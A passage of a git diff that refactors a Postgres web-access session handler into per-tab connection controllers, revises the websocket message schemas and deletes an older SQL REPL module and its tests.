"eeeeeeee-eeee-eeee-eeee-eeeeeeeeeeee"); + await openConnection(ctx, "ffffffff-ffff-ffff-ffff-ffffffffffff"); + + const opens = getSentResponses(ctx).filter((r) => r.type === PostgresServerMessageType.ConnectionOpened); + expect(opens).toHaveLength(2); + expect(opens[0].backendPid).not.toBe(opens[1].backendPid); }); }); diff --git a/backend/src/ee/services/pam-web-access/pam-postgres-session-handler.ts b/backend/src/ee/services/pam-web-access/pam-postgres-session-handler.ts index 43d3d89c22e..cbf32726388 100644 --- a/backend/src/ee/services/pam-web-access/pam-postgres-session-handler.ts +++ b/backend/src/ee/services/pam-web-access/pam-postgres-session-handler.ts @@ -1,6 +1,4 @@ -import { parse as parseSql } from "libpg-query"; -import pg from "pg"; -import Cursor from "pg-cursor"; +import crypto from "crypto"; import { TPostgresAccountCredentials, @@ -8,15 +6,18 @@ import { } from "@app/ee/services/pam-resource/postgres/postgres-resource-types"; import { logger } from "@app/lib/logger"; -import { getSchemasQuery, getTableDetailQuery, getTablesQuery } from "./pam-postgres-data-explorer-metadata"; +import { + createPostgresConnectionController, + type TPostgresConnectionController +} from "./pam-postgres-connection-controller"; +import { fetchSchemasOneShot, fetchTablesOneShot, verifyReachabilityOneShot } from "./pam-postgres-metadata"; import { PostgresClientMessageSchema, PostgresClientMessageType, PostgresServerMessageType, type TPostgresCorrelatedServerMessage } from "./pam-postgres-ws-types"; -import { parseClientMessage, resolveEndReason } from "./pam-web-access-fns"; -import { createPamSqlRepl } from "./pam-web-access-repl"; +import { parseClientMessage } from "./pam-web-access-fns"; import { SessionEndReason, TerminalServerMessageType, @@ -29,56 +30,52 @@ type TPostgresSessionParams = { credentials: TPostgresAccountCredentials; }; +// Fan-out bound inside a single already-authenticated WS session. 
+const MAX_CONNECTIONS_PER_WS = 20; + +// Unwrap a pg driver error into the shape our WS error responses expect. +const toPgErrorFields = (err: unknown) => { + const pgErr = err as { message?: string; detail?: string; hint?: string }; + return { message: pgErr.message, detail: pgErr.detail, hint: pgErr.hint }; +}; + export const handlePostgresSession = async ( ctx: TSessionContext, params: TPostgresSessionParams ): Promise => { - const { socket, relayPort, resourceName, sessionId, sendMessage, sendSessionEnd, isNearSessionExpiry, onCleanup } = - ctx; + const { socket, relayPort, resourceName, sessionId, sendMessage, sendSessionEnd, onCleanup } = ctx; const { connectionDetails, credentials } = params; - // Type parser shared between the pg.Client and pg-cursor instances so all - // results β€” whether fetched via the simple query path or cursor β€” apply the - // same normalisation rules. - const pgTypes = { - getTypeParser: (oid: number) => { - // Boolean (OID 16): Postgres wire protocol sends 't'/'f' β€” expand to 'true'/'false' - // so the Data Explorer UI displays human-readable literals. - if (oid === 16) - return (val: string | Buffer) => { - const raw = typeof val === "string" ? val : val.toString("utf8"); - return raw === "t" ? "true" : "false"; - }; - return (val: string | Buffer) => (typeof val === "string" ? 
val : val.toString("hex")); - } + const oneShotOpts = { + relayPort, + username: credentials.username, + database: connectionDetails.database }; - const pgClient = new pg.Client({ - host: "localhost", - port: relayPort, - user: credentials.username, - database: connectionDetails.database, - password: "", - ssl: false, - connectionTimeoutMillis: 30_000, - statement_timeout: 30_000, - types: pgTypes - }); - - await pgClient.connect(); - - const { rows: pidRows } = await pgClient.query<{ pid: number }>("SELECT pg_backend_pid() AS pid"); - const backendPid = pidRows[0]?.pid; - - const repl = createPamSqlRepl(pgClient); + // Early reachability check β€” fail fast before sending ready, preserving the + // early "Connection error" UX the FE relies on. + try { + await verifyReachabilityOneShot(oneShotOpts); + } catch (err) { + logger.error(err, `Postgres reachability check failed [sessionId=${sessionId}]`); + sendSessionEnd(SessionEndReason.SetupFailed); + onCleanup(); + try { + socket.close(); + } catch { + // ignore + } + return { + cleanup: async () => {} + }; + } sendMessage({ type: TerminalServerMessageType.Ready, - data: `Connected to ${resourceName} (${connectionDetails.database}) as ${credentials.username}\n\n`, - prompt: "=> " + data: `Connected to ${resourceName} (${connectionDetails.database}) as ${credentials.username}\n\n` }); - logger.info({ sessionId }, "Postgres web access session established"); + logger.info(`Postgres web access session established [sessionId=${sessionId}]`); const sendResponse = (msg: TPostgresCorrelatedServerMessage) => { try { @@ -86,289 +83,198 @@ export const handlePostgresSession = async ( socket.send(JSON.stringify(msg)); } } catch (err) { - logger.error(err, "Failed to send WebSocket message"); + logger.error(err, `Failed to send WebSocket message [sessionId=${sessionId}]`); } }; - // Server-side transaction state β€” updated after every query so the client - // always receives the authoritative value, including for multi-statement 
SQL. - let isInTransaction = false; + const controllers = new Map(); + // Reserved slots for in-flight opens β€” counted against the cap so a burst of + // open-connection messages can't all pass the check before any of them + // finishes inserting into `controllers`. + let pendingOpens = 0; - // Shared error handler for correlated query messages - const sendQueryError = async (id: string, err: unknown) => { - const pgErr = err as { message?: string; detail?: string; hint?: string }; - - // If the failed query was inside a transaction, roll back so the - // connection is not stuck in an aborted transaction state. - try { - await pgClient.query("ROLLBACK"); - } catch { - // ROLLBACK fails if there was no active transaction β€” safe to ignore. - } + // Metadata requests (get-schemas / get-tables) are processed outside any + // controller queue so sidebar refreshes don't block tab work. + let metadataPromise: Promise = Promise.resolve(); - isInTransaction = false; + // --- Per-message handlers --- - sendResponse({ - type: PostgresServerMessageType.Error, - id, - error: pgErr.message ?? "Query execution failed", - detail: pgErr.detail, - hint: pgErr.hint - }); - }; + const openTabConnection = async (requestId: string) => { + if (controllers.size + pendingOpens >= MAX_CONNECTIONS_PER_WS) { + sendResponse({ + type: PostgresServerMessageType.ConnectionOpenFailed, + id: requestId, + error: `Maximum ${MAX_CONNECTIONS_PER_WS} connections per session reached` + }); + return; + } - // Cancel the currently running query via pg_cancel_backend. - // Runs on a separate connection so it is not blocked by the sequential queue. 
- const cancelRunningQuery = async () => { - if (!backendPid) return; - const pid = backendPid; - const cancelClient = new pg.Client({ - host: "localhost", - port: relayPort, - user: credentials.username, - database: connectionDetails.database, - password: "", - ssl: false, - connectionTimeoutMillis: 5_000 - }); + pendingOpens += 1; + const connectionId = crypto.randomUUID(); try { - await cancelClient.connect(); - await cancelClient.query("SELECT pg_cancel_backend($1)", [pid]); + const controller = await createPostgresConnectionController({ + relayPort, + username: credentials.username, + database: connectionDetails.database, + sessionId, + connectionId, + sendResponse, + onUnexpectedTermination: (reason) => { + if (!controllers.has(connectionId)) return; + controllers.delete(connectionId); + sendResponse({ + type: PostgresServerMessageType.ConnectionClosed, + connectionId, + reason + }); + } + }); + controllers.set(connectionId, controller); + sendResponse({ + type: PostgresServerMessageType.ConnectionOpened, + id: requestId, + connectionId, + backendPid: controller.backendPid + }); } catch (err) { - logger.debug(err, "Failed to cancel backend query"); + const msg = err instanceof Error ? err.message : "Failed to open connection"; + logger.error(err, `Failed to open tab connection [sessionId=${sessionId}]`); + sendResponse({ + type: PostgresServerMessageType.ConnectionOpenFailed, + id: requestId, + error: msg + }); } finally { - await cancelClient.end().catch(() => {}); + pendingOpens -= 1; } }; - // Sequential message processing to prevent concurrent query issues - let processingPromise = Promise.resolve(); - - socket.on("message", (rawData: Buffer | ArrayBuffer | Buffer[]) => { - const message = parseClientMessage(rawData, PostgresClientMessageSchema); - - // Cancel is handled immediately outside the sequential queue so it can - // interrupt a running query rather than waiting behind it. 
- if (message?.type === PostgresClientMessageType.Cancel) { - void cancelRunningQuery(); - return; - } - - processingPromise = processingPromise + // Queue a metadata fetch (schemas / tables) behind any in-flight metadata + // call so one-shot pg.Clients don't pile up. Errors are normalised into + // PostgresServerMessageType.Error responses tied to the request id. + const queueMetadata = ( + requestId: string, + fetcher: () => Promise, + onSuccess: (rows: T) => TPostgresCorrelatedServerMessage, + fallbackError: string + ) => { + metadataPromise = metadataPromise .then(async () => { - if (!message) { - sendMessage({ - type: TerminalServerMessageType.Output, - data: "Invalid message format\n", - prompt: repl.getPrompt() + try { + const rows = await fetcher(); + sendResponse(onSuccess(rows)); + } catch (err) { + const { message: errMsg, detail, hint } = toPgErrorFields(err); + sendResponse({ + type: PostgresServerMessageType.Error, + id: requestId, + error: errMsg ?? fallbackError, + detail, + hint }); - return; } + }) + .catch(() => {}); + }; - switch (message.type) { - case PostgresClientMessageType.GetSchemas: { - try { - const query = getSchemasQuery(); - const result = await pgClient.query(query.text, query.values); - sendResponse({ - type: PostgresServerMessageType.Schemas, - id: message.id, - data: result.rows as { name: string }[] - }); - } catch (err) { - await sendQueryError(message.id, err); - } - break; - } - - case PostgresClientMessageType.GetTables: { - try { - const query = getTablesQuery(message.schema); - const result = await pgClient.query(query.text, query.values); - sendResponse({ - type: PostgresServerMessageType.Tables, - id: message.id, - data: result.rows as { name: string; tableType: string }[] - }); - } catch (err) { - await sendQueryError(message.id, err); - } - break; - } - - case PostgresClientMessageType.GetTableDetail: { - try { - const query = getTableDetailQuery(message.schema, message.table); - const result = await pgClient.query<{ 
result: string }>(query.text, query.values); - const rawDetail = result.rows[0]?.result; - if (!rawDetail) { - sendResponse({ - type: PostgresServerMessageType.Error, - id: message.id, - error: "Table not found or no metadata available" - }); - break; - } - const detail = - typeof rawDetail === "string" - ? (JSON.parse(rawDetail) as Record) - : (rawDetail as unknown as Record); - sendResponse({ - type: PostgresServerMessageType.TableDetail, - id: message.id, - data: detail as { - columns: { - name: string; - type: string; - nullable: boolean; - identityGeneration: string | null; - }[]; - primaryKeys: string[]; - foreignKeys: { - constraintName: string; - columns: string[]; - targetSchema: string; - targetTable: string; - targetColumns: string[]; - }[]; - } - }); - } catch (err) { - await sendQueryError(message.id, err); - } - break; - } - - case PostgresClientMessageType.Query: { - try { - const startTime = performance.now(); - const MAX_ROWS = 1000; - - // Split the SQL into individual statements using the real PostgreSQL C parser - // (via libpg-query WASM). Each statement is then run through a pg-cursor with - // an explicit row cap β€” the server sends at most MAX_ROWS+1 rows at the wire - // level regardless of result set size, so memory usage is bounded. - // eslint-disable-next-line @typescript-eslint/no-unsafe-assignment - const parsed = await parseSql(message.sql); - // eslint-disable-next-line @typescript-eslint/no-unsafe-member-access - const stmtTexts = (parsed.stmts as Array<{ stmt_location?: number; stmt_len?: number }>).map((s) => { - const location = s.stmt_location ?? 0; - return s.stmt_len !== undefined - ? 
message.sql.slice(location, location + s.stmt_len) - : message.sql.slice(location).trim(); - }); - - let lastRows: Record[] = []; - let lastFields: { name: string }[] = []; - let lastRowCount: number | null = null; - let lastCommand = ""; - let lastIsTruncated = false; - - for (const stmtSql of stmtTexts) { - const cursor = pgClient.query(new Cursor(stmtSql.trim(), null, { types: pgTypes })); - // eslint-disable-next-line no-await-in-loop - const stmtRows = await cursor.read(MAX_ROWS + 1); - const stmtIsTruncated = stmtRows.length > MAX_ROWS; - if (stmtIsTruncated) stmtRows.splice(MAX_ROWS); - // eslint-disable-next-line no-await-in-loop - await cursor.close(); - - // eslint-disable-next-line no-underscore-dangle - const cursorResult = cursor._result; - const cmd = (cursorResult.command ?? "").toUpperCase(); - if (cmd === "BEGIN" || cmd === "START") isInTransaction = true; - if (cmd === "COMMIT" || cmd === "ROLLBACK") isInTransaction = false; - - lastRows = stmtRows; - lastFields = (cursorResult.fields ?? []).map((f) => ({ name: f.name })); - lastRowCount = cursorResult.rowCount; - lastCommand = cursorResult.command ?? 
""; - lastIsTruncated = stmtIsTruncated; - } + socket.on("message", (rawData: Buffer | ArrayBuffer | Buffer[]) => { + const message = parseClientMessage(rawData, PostgresClientMessageSchema); + if (!message) return; + + switch (message.type) { + case PostgresClientMessageType.Control: { + if (message.data === "quit") { + sendSessionEnd(SessionEndReason.UserQuit); + onCleanup(); + socket.close(); + } + break; + } - const executionTimeMs = Math.round(performance.now() - startTime); - sendResponse({ - type: PostgresServerMessageType.QueryResult, - id: message.id, - rows: lastRows, - fields: lastFields, - rowCount: lastRowCount, - isTruncated: lastIsTruncated, - transactionOpen: isInTransaction, - command: lastCommand, - executionTimeMs - }); - } catch (err) { - await sendQueryError(message.id, err); - } - break; - } + case PostgresClientMessageType.OpenConnection: { + void openTabConnection(message.id); + break; + } - case PostgresClientMessageType.Control: { - if (message.data === "quit") { - sendSessionEnd(SessionEndReason.UserQuit); - onCleanup(); - socket.close(); - return; - } - if (message.data === "clear-buffer") { - repl.clearBuffer(); - } - break; - } + case PostgresClientMessageType.CloseConnection: { + const controller = controllers.get(message.connectionId); + if (!controller) return; + controllers.delete(message.connectionId); + controller.dispose(); + break; + } - case PostgresClientMessageType.Input: { - const replResult = await repl.processInput(message.data); + case PostgresClientMessageType.Cancel: { + const controller = controllers.get(message.connectionId); + if (!controller || controller.isDisposing()) { + logger.debug( + `Cancel on missing/disposing connection [sessionId=${sessionId}] [connectionId=${message.connectionId}]` + ); + return; + } + controller.handleMessage(message); + break; + } - if (replResult.shouldClose) { - sendSessionEnd(SessionEndReason.UserQuit); - onCleanup(); - socket.close(); - return; - } + case 
PostgresClientMessageType.GetSchemas: { + queueMetadata( + message.id, + () => fetchSchemasOneShot(oneShotOpts), + (rows) => ({ type: PostgresServerMessageType.Schemas, id: message.id, data: rows }), + "Failed to fetch schemas" + ); + break; + } - sendMessage({ - type: TerminalServerMessageType.Output, - data: replResult.output, - prompt: replResult.prompt - }); - break; - } + case PostgresClientMessageType.GetTables: { + queueMetadata( + message.id, + () => fetchTablesOneShot(oneShotOpts, message.schema), + (rows) => ({ type: PostgresServerMessageType.Tables, id: message.id, data: rows }), + "Failed to fetch tables" + ); + break; + } - default: - break; + case PostgresClientMessageType.GetTableDetail: + case PostgresClientMessageType.Query: { + const controller = controllers.get(message.connectionId); + if (!controller || controller.isDisposing()) { + sendResponse({ + type: PostgresServerMessageType.Error, + id: message.id, + connectionId: message.connectionId, + error: "Connection not found" + }); + return; } - }) - .catch((err) => { - logger.error(err, "Error processing Postgres message"); - sendMessage({ - type: TerminalServerMessageType.Output, - data: "Internal error\n", - prompt: "=> " - }); - }); - }); + controller.handleMessage(message); + break; + } - // Tunnel drop detection - pgClient.on("error", (err) => { - logger.error(err, "Database connection error"); - sendSessionEnd(resolveEndReason(isNearSessionExpiry)); - onCleanup(); - socket.close(); - }); + case PostgresClientMessageType.Activity: { + // No-op. The idle timer is reset by the sibling socket.on("message") + // listener in pam-web-access-service.ts β€” this branch just keeps the + // discriminated-union exhaustive so the `default` arm stays unreachable. 
+ break; + } - pgClient.on("end", () => { - sendSessionEnd(resolveEndReason(isNearSessionExpiry)); - onCleanup(); - socket.close(); + default: + break; + } }); return { cleanup: async () => { - try { - await pgClient.end(); - } catch (err) { - logger.debug(err, "Error closing pg client"); + // dispose() is synchronous and fire-and-forget β€” no await needed. + const snapshot = Array.from(controllers.values()); + controllers.clear(); + for (const controller of snapshot) { + try { + controller.dispose(); + } catch (err) { + logger.debug(err, `Error disposing controller [sessionId=${sessionId}]`); + } } } }; diff --git a/backend/src/ee/services/pam-web-access/pam-postgres-ws-types.ts b/backend/src/ee/services/pam-web-access/pam-postgres-ws-types.ts index bda4395a9e0..3877d8bbc17 100644 --- a/backend/src/ee/services/pam-web-access/pam-postgres-ws-types.ts +++ b/backend/src/ee/services/pam-web-access/pam-postgres-ws-types.ts @@ -1,40 +1,40 @@ import { z } from "zod"; -import { SessionEndReason } from "./pam-web-access-types"; - export enum PostgresClientMessageType { - Input = "input", Control = "control", GetSchemas = "get-schemas", GetTables = "get-tables", GetTableDetail = "get-table-detail", Query = "query", - Cancel = "cancel" + Cancel = "cancel", + OpenConnection = "open-connection", + CloseConnection = "close-connection", + Activity = "activity" } export enum PostgresServerMessageType { - Ready = "ready", - Output = "output", - SessionEnd = "session_end", Schemas = "schemas", Tables = "tables", TableDetail = "table-detail", QueryResult = "query-result", - Error = "error" + Error = "error", + ConnectionOpened = "connection-opened", + ConnectionOpenFailed = "connection-open-failed", + ConnectionClosed = "connection-closed" } -// --- Shared base for correlated request/response messages --- +// --- Shared bases --- const CorrelatedBaseSchema = z.object({ id: z.string().uuid() }); +const TabScopedBaseSchema = CorrelatedBaseSchema.extend({ connectionId: 
z.string().uuid() }); // ===================================================================== // Client messages (client β†’ server) β€” single flat discriminated union // ===================================================================== -const InputSchema = z.object({ type: z.literal(PostgresClientMessageType.Input), data: z.string() }); - const ControlSchema = z.object({ type: z.literal(PostgresClientMessageType.Control), data: z.string() }); +// Metadata messages β€” not connectionId-scoped; served by one-shot pg.Clients. const GetSchemasRequestSchema = CorrelatedBaseSchema.extend({ type: z.literal(PostgresClientMessageType.GetSchemas) }); @@ -44,46 +44,61 @@ const GetTablesRequestSchema = CorrelatedBaseSchema.extend({ schema: z.string() }); -const GetTableDetailRequestSchema = CorrelatedBaseSchema.extend({ +// Tab-scoped messages β€” carry connectionId; routed to a specific controller. +const GetTableDetailRequestSchema = TabScopedBaseSchema.extend({ type: z.literal(PostgresClientMessageType.GetTableDetail), schema: z.string(), table: z.string() }); -const QueryRequestSchema = CorrelatedBaseSchema.extend({ +const QueryRequestSchema = TabScopedBaseSchema.extend({ type: z.literal(PostgresClientMessageType.Query), sql: z.string().max(50 * 1024) }); -const CancelSchema = z.object({ type: z.literal(PostgresClientMessageType.Cancel) }); +// Cancel stays fire-and-forget; gains connectionId for routing but not id. +const CancelSchema = z.object({ + type: z.literal(PostgresClientMessageType.Cancel), + connectionId: z.string().uuid() +}); + +// Lifecycle β€” open/close tab controllers. 
+const OpenConnectionSchema = CorrelatedBaseSchema.extend({ + type: z.literal(PostgresClientMessageType.OpenConnection) +}); + +const CloseConnectionSchema = z.object({ + type: z.literal(PostgresClientMessageType.CloseConnection), + connectionId: z.string().uuid() +}); + +// Fire-and-forget heartbeat sent by the FE while the browser tab is visible, so +// the server-side idle timer only fires on truly inactive tabs β€” not on active +// read-only sessions that don't happen to send queries. +const ActivitySchema = z.object({ + type: z.literal(PostgresClientMessageType.Activity) +}); export const PostgresClientMessageSchema = z.discriminatedUnion("type", [ - InputSchema, ControlSchema, GetSchemasRequestSchema, GetTablesRequestSchema, GetTableDetailRequestSchema, QueryRequestSchema, - CancelSchema + CancelSchema, + OpenConnectionSchema, + CloseConnectionSchema, + ActivitySchema ]); export type TPostgresClientMessage = z.infer; // ===================================================================== -// Server messages (server β†’ client) β€” single flat discriminated union +// Server messages (server β†’ client) β€” correlated request/response schemas. +// Lifecycle messages (ready / session_end) travel on the shared +// TerminalServerMessageType channel defined in pam-web-access-types.ts. 
// ===================================================================== -const OutputSchema = z.object({ - type: z.enum([PostgresServerMessageType.Ready, PostgresServerMessageType.Output]), - data: z.string(), - prompt: z.string().default("") -}); - -const SessionEndSchema = z.object({ - type: z.literal(PostgresServerMessageType.SessionEnd), - reason: z.nativeEnum(SessionEndReason) -}); - const SchemasResponseSchema = CorrelatedBaseSchema.extend({ type: z.literal(PostgresServerMessageType.Schemas), data: z.array(z.object({ name: z.string() })) @@ -94,8 +109,9 @@ const TablesResponseSchema = CorrelatedBaseSchema.extend({ data: z.array(z.object({ name: z.string(), tableType: z.string() })) }); -const TableDetailResponseSchema = CorrelatedBaseSchema.extend({ +const TableDetailResponseSchema = TabScopedBaseSchema.extend({ type: z.literal(PostgresServerMessageType.TableDetail), + transactionOpen: z.boolean(), data: z.object({ columns: z.array( z.object({ @@ -128,7 +144,7 @@ const TableDetailResponseSchema = CorrelatedBaseSchema.extend({ }) }); -const QueryResultResponseSchema = CorrelatedBaseSchema.extend({ +const QueryResultResponseSchema = TabScopedBaseSchema.extend({ type: z.literal(PostgresServerMessageType.QueryResult), rows: z.array(z.record(z.string(), z.unknown())), fields: z.array( @@ -145,28 +161,45 @@ const QueryResultResponseSchema = CorrelatedBaseSchema.extend({ executionTimeMs: z.number() }); +// Error responses carry transactionOpen for tab-scoped errors so the FE banner +// stays in sync after auto-rollback. connectionId is optional because errors +// can come from metadata requests (no connectionId) or unknown-connectionId +// cases tied to a request id. 
const ErrorResponseSchema = CorrelatedBaseSchema.extend({ type: z.literal(PostgresServerMessageType.Error), + connectionId: z.string().uuid().optional(), + transactionOpen: z.boolean().optional(), error: z.string(), detail: z.string().optional(), hint: z.string().optional() }); -export const PostgresServerMessageSchema = z.discriminatedUnion("type", [ - OutputSchema, - SessionEndSchema, - SchemasResponseSchema, - TablesResponseSchema, - TableDetailResponseSchema, - QueryResultResponseSchema, - ErrorResponseSchema -]); +// Lifecycle responses. +const ConnectionOpenedResponseSchema = CorrelatedBaseSchema.extend({ + type: z.literal(PostgresServerMessageType.ConnectionOpened), + connectionId: z.string().uuid(), + backendPid: z.number().nullable() +}); + +const ConnectionOpenFailedResponseSchema = CorrelatedBaseSchema.extend({ + type: z.literal(PostgresServerMessageType.ConnectionOpenFailed), + error: z.string() +}); + +// Informational β€” BE pushes this when a controller dies outside clean dispose. 
+const ConnectionClosedResponseSchema = z.object({ + type: z.literal(PostgresServerMessageType.ConnectionClosed), + connectionId: z.string().uuid(), + reason: z.string() +}); -// Correlated server messages only (excludes lifecycle messages like ready/output/session_end) export type TPostgresCorrelatedServerMessage = z.infer< | typeof SchemasResponseSchema | typeof TablesResponseSchema | typeof TableDetailResponseSchema | typeof QueryResultResponseSchema | typeof ErrorResponseSchema + | typeof ConnectionOpenedResponseSchema + | typeof ConnectionOpenFailedResponseSchema + | typeof ConnectionClosedResponseSchema >; diff --git a/backend/src/ee/services/pam-web-access/pam-web-access-repl.test.ts b/backend/src/ee/services/pam-web-access/pam-web-access-repl.test.ts deleted file mode 100644 index a8e6a156942..00000000000 --- a/backend/src/ee/services/pam-web-access/pam-web-access-repl.test.ts +++ /dev/null @@ -1,238 +0,0 @@ -import { beforeEach, describe, expect, it, vi } from "vitest"; - -import { createPamSqlRepl, TQueryExecutor } from "./pam-web-access-repl"; - -describe("createPamSqlRepl", () => { - let queryFn: ReturnType; - let mockExecutor: TQueryExecutor; - let repl: ReturnType; - - beforeEach(() => { - queryFn = vi.fn().mockResolvedValue({ - command: "SELECT", - rowCount: 1, - fields: [{ name: "?column?", dataTypeID: 23 }], - rows: [{ "?column?": 1 }] - }); - mockExecutor = { query: queryFn }; - repl = createPamSqlRepl(mockExecutor); - }); - - // Statement execution - it("executes complete statement", async () => { - const result = await repl.processInput("SELECT 1;"); - expect(queryFn).toHaveBeenCalledWith("SELECT 1"); - expect(result.output).toContain("1"); - expect(result.prompt).toBe("=> "); - expect(result.shouldClose).toBe(false); - }); - - it("buffers incomplete input", async () => { - const result = await repl.processInput("SELECT *"); - expect(queryFn).not.toHaveBeenCalled(); - expect(result.output).toBe(""); - expect(result.prompt).toBe("-> "); - 
expect(result.shouldClose).toBe(false); - }); - - it("executes after completing buffered statement", async () => { - await repl.processInput("SELECT *"); - expect(queryFn).not.toHaveBeenCalled(); - - const result = await repl.processInput("FROM users;"); - expect(queryFn).toHaveBeenCalledWith("SELECT *\nFROM users"); - expect(result.prompt).toBe("=> "); - }); - - it("executes multiple statements sequentially", async () => { - queryFn - .mockResolvedValueOnce({ - command: "SELECT", - rowCount: 1, - fields: [{ name: "?column?", dataTypeID: 23 }], - rows: [{ "?column?": 1 }] - }) - .mockResolvedValueOnce({ - command: "SELECT", - rowCount: 1, - fields: [{ name: "?column?", dataTypeID: 23 }], - rows: [{ "?column?": 2 }] - }); - - const result = await repl.processInput("SELECT 1; SELECT 2;"); - expect(queryFn).toHaveBeenCalledTimes(2); - expect(queryFn).toHaveBeenCalledWith("SELECT 1"); - expect(queryFn).toHaveBeenCalledWith("SELECT 2"); - expect(result.prompt).toBe("=> "); - }); - - // Quit - it("returns shouldClose for \\q", async () => { - const result = await repl.processInput("\\q"); - expect(result.shouldClose).toBe(true); - expect(result.output).toBe("Goodbye!\n"); - expect(queryFn).not.toHaveBeenCalled(); - }); - - it("returns shouldClose for quit", async () => { - const result = await repl.processInput("quit"); - expect(result.shouldClose).toBe(true); - }); - - it("returns shouldClose for exit", async () => { - const result = await repl.processInput("exit"); - expect(result.shouldClose).toBe(true); - }); - - it("treats quit as SQL when buffer non-empty", async () => { - await repl.processInput("SELECT"); - const result = await repl.processInput("quit;"); - expect(result.shouldClose).toBe(false); - expect(queryFn).toHaveBeenCalledWith("SELECT\nquit"); - }); - - // Buffer management - it("clearBuffer resets to empty", async () => { - await repl.processInput("SELECT *"); - expect(repl.getPrompt()).toBe("-> "); - - repl.clearBuffer(); - 
expect(repl.getPrompt()).toBe("=> "); - }); - - it("getPrompt returns => when buffer empty", () => { - expect(repl.getPrompt()).toBe("=> "); - }); - - it("getPrompt returns -> when buffer has content", async () => { - await repl.processInput("SELECT *"); - expect(repl.getPrompt()).toBe("-> "); - }); - - // Error handling - it("catches query error and returns formatted error", async () => { - queryFn.mockRejectedValueOnce({ - message: 'relation "nonexistent" does not exist' - }); - - const result = await repl.processInput("SELECT * FROM nonexistent;"); - expect(result.output).toContain("ERROR:"); - expect(result.output).toContain("nonexistent"); - expect(result.shouldClose).toBe(false); - expect(result.prompt).toBe("=> "); - }); - - it("continues working after error", async () => { - queryFn.mockRejectedValueOnce({ message: "error" }).mockResolvedValueOnce({ - command: "SELECT", - rowCount: 1, - fields: [{ name: "?column?", dataTypeID: 23 }], - rows: [{ "?column?": 1 }] - }); - - await repl.processInput("BAD SQL;"); - const result = await repl.processInput("SELECT 1;"); - expect(result.output).toContain("1"); - expect(result.prompt).toBe("=> "); - }); - - // Empty input - it("re-prompts on empty input with empty buffer", async () => { - const result = await repl.processInput(""); - expect(queryFn).not.toHaveBeenCalled(); - expect(result.prompt).toBe("=> "); - }); - - it("skips empty statements (bare ;)", async () => { - const result = await repl.processInput(";"); - expect(queryFn).not.toHaveBeenCalled(); - expect(result.prompt).toBe("=> "); - }); - - it("handles mixed complete + incomplete on one input", async () => { - queryFn.mockResolvedValueOnce({ - command: "SELECT", - rowCount: 1, - fields: [{ name: "?column?", dataTypeID: 23 }], - rows: [{ "?column?": 1 }] - }); - - const result = await repl.processInput("SELECT 1; SELECT"); - expect(queryFn).toHaveBeenCalledTimes(1); - expect(queryFn).toHaveBeenCalledWith("SELECT 1"); - expect(result.prompt).toBe("-> "); - 
- // Complete the second statement - queryFn.mockResolvedValueOnce({ - command: "SELECT", - rowCount: 1, - fields: [{ name: "?column?", dataTypeID: 23 }], - rows: [{ "?column?": 2 }] - }); - - const result2 = await repl.processInput("2;"); - expect(queryFn).toHaveBeenCalledTimes(2); - expect(result2.prompt).toBe("=> "); - }); - - it("DML result formatting", async () => { - queryFn.mockResolvedValueOnce({ - command: "INSERT", - rowCount: 1, - fields: [], - rows: [] - }); - - const result = await repl.processInput("INSERT INTO t VALUES(1);"); - expect(result.output).toBe("INSERT 0 1\n"); - }); - - it("returns error and clears buffer when input exceeds 1 MB limit", async () => { - const oversized = "A".repeat(1024 * 1024 + 1); - const result = await repl.processInput(oversized); - expect(result.output).toContain("buffer size exceeded"); - expect(result.prompt).toBe("=> "); - expect(result.shouldClose).toBe(false); - expect(queryFn).not.toHaveBeenCalled(); - - // REPL should still work after buffer was cleared - queryFn.mockResolvedValueOnce({ - command: "SELECT", - rowCount: 1, - fields: [{ name: "?column?", dataTypeID: 23 }], - rows: [{ "?column?": 1 }] - }); - const next = await repl.processInput("SELECT 1;"); - expect(next.output).toContain("1"); - expect(next.prompt).toBe("=> "); - }); - - it("multi-statement paste", async () => { - queryFn - .mockResolvedValueOnce({ - command: "CREATE TABLE", - rowCount: null, - fields: [], - rows: [] - }) - .mockResolvedValueOnce({ - command: "INSERT", - rowCount: 1, - fields: [], - rows: [] - }) - .mockResolvedValueOnce({ - command: "SELECT", - rowCount: 1, - fields: [{ name: "id", dataTypeID: 23 }], - rows: [{ id: 1 }] - }); - - const result = await repl.processInput("CREATE TABLE t(id int); INSERT INTO t VALUES(1); SELECT * FROM t;"); - expect(queryFn).toHaveBeenCalledTimes(3); - expect(result.output).toContain("CREATE TABLE"); - expect(result.output).toContain("INSERT 0 1"); - expect(result.output).toContain("(1 row)"); - 
expect(result.prompt).toBe("=> "); - }); -}); diff --git a/backend/src/ee/services/pam-web-access/pam-web-access-repl.ts b/backend/src/ee/services/pam-web-access/pam-web-access-repl.ts deleted file mode 100644 index 47c5bfb9651..00000000000 --- a/backend/src/ee/services/pam-web-access/pam-web-access-repl.ts +++ /dev/null @@ -1,93 +0,0 @@ -import { formatCommandResult, formatError, formatTable } from "./pam-web-access-sql-formatter"; -import { splitStatements } from "./pam-web-access-sql-lexer"; - -/** - * The REPL only depends on this interface, not on pg.Client directly. - * pg.Client satisfies this interface out of the box. - */ -export type TQueryExecutor = { - query(sql: string): Promise<{ - command: string; - rowCount: number | null; - fields: Array<{ name: string; dataTypeID: number }>; - rows: Record[]; - }>; -}; - -export type TPamSqlRepl = ReturnType; - -const MAX_BUFFER_SIZE = 1024 * 1024; // 1 MB - -export const createPamSqlRepl = (queryExecutor: TQueryExecutor) => { - let buffer = ""; - - const executeStatement = async (sql: string): Promise => { - try { - const result = await queryExecutor.query(sql); - - if (result.fields?.length > 0) { - return formatTable(result); - } - return formatCommandResult(result); - } catch (err) { - return formatError(err); - } - }; - - const processInput = async ( - rawInput: string - ): Promise<{ - output: string; - prompt: string; - shouldClose: boolean; - }> => { - // Check for quit commands when buffer is empty - if (buffer.trim().length === 0) { - const trimmed = rawInput.trim(); - if (trimmed === "\\q" || trimmed === "quit" || trimmed === "exit") { - return { output: "Goodbye!\n", prompt: "", shouldClose: true }; - } - } - - // Append input to buffer - if (buffer.length > 0) { - buffer += `\n${rawInput}`; - } else { - buffer = rawInput; - } - - if (buffer.length > MAX_BUFFER_SIZE) { - buffer = ""; - return { - output: "ERROR: buffer size exceeded (1 MB limit). 
